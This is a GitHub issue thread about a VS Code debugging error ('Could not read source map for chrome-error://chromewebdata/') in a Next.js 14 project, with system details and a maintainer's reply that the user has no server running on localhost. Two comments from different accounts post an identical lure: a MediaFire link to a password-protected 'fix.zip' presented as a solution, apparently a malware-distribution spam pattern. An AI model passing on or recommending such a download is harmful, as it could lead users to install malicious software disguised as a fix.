### ISSUE TITLE
Unable to debug next.js 14 Proj

### ISSUE THREAD

**Issue by pcinstead** [microsoft/vscode#226579]
Type: <b>Bug</b>

I am encountering an issue in Visual Studio Code related to source maps. The error message I receive is:

Could not read source map for chrome-error://chromewebdata/: Unexpected 503 response from chrome-error://chromewebdata/neterror.rollup.js.map: Unsupported protocol "chrome-error:"

### Environment
- **VS Code Version:** 1.92.2 (user setup)
- **Commit:** fee1edb8d6d72a0ddff41e5f71a671c23ed924b9
- **Date:** 2024-08-14T17:29:30.058Z
- **Electron:** 30.1.2
- **ElectronBuildId:** 9870757
- **Chromium:** 124.0.6367.243
- **Node.js:** 20.14.0
- **V8:** 12.4.254.20-electron.0
- **OS:** Windows_NT x64 10.0.22631

### Steps to Reproduce

1. Open a project in VS Code.
2. Start debugging with Chrome as the target browser.
3. Observe the error message in the debug console.

### Screenshots

![Screenshot 2024-08-26 103153](https://github.com/user-attachments/assets/a08924d9-bb94-4fa0-8451-b687923d7faf)
![Screenshot 2024-08-26 103307](https://github.com/user-attachments/assets/40c3804c-52ce-42fa-a463-43050565b792)

Any insights or potential solutions for addressing this issue would be appreciated.

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Windows_NT x64 10.0.22631
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|AMD Ryzen 5 5600H with Radeon Graphics          (12 x 3294)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|undefined|
|Memory (System)|15.39GB (8.83GB free)|
|Process Argv|--crash-reporter-id b1fbad2f-b877-4827-a20a-7727e832f4b7|
|Screen Reader|no|
|VM|0%|
</details><details><summary>Extensions (10)</summary>

Extension|Author (truncated)|Version
---|---|---
vscode-tailwindcss|bra|0.12.7
vscode-eslint|dba|3.0.10
prettier-vscode|esb|11.0.0
vs-code-runner|Har|2.0.1
js-debug-nightly|ms-|2024.8.2117
vscode-xml|red|0.27.1
LiveServer|rit|5.7.9
bash-beautify|sha|0.1.1
intellicode-api-usage-examples|Vis|0.2.8
vscodeintellicode|Vis|1.3.1

</details><details>
<summary>A/B Experiments</summary>

```
vsliv368:30146709
vspor879:30202332
vspor708:30202333
vspor363:30204092
vscod805cf:30301675
binariesv615:30325510
vsaa593:30376534
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyone:30548225
962ge761:30959799
pythongtdpath:30769146
welcomedialogc:30910334
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
2e7ec940:31000449
pythontbext0:30879054
accentitlementst:30995554
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
0ee40948:31013168
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupyter:31046869
impr_priority:31102340
refactort:31108082
pythonrstrctxt:31112756
wkspc-onlycs-c:31111717
wkspc-ranged-c:31123312
ei213698:31121563

```

</details>

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by roblourens** [comment]
This `Could not read source map for chrome-error://chromewebdata/:` is not a real problem

You don't have a server running on `localhost`. VS Code doesn't start that for you, you need to start your server
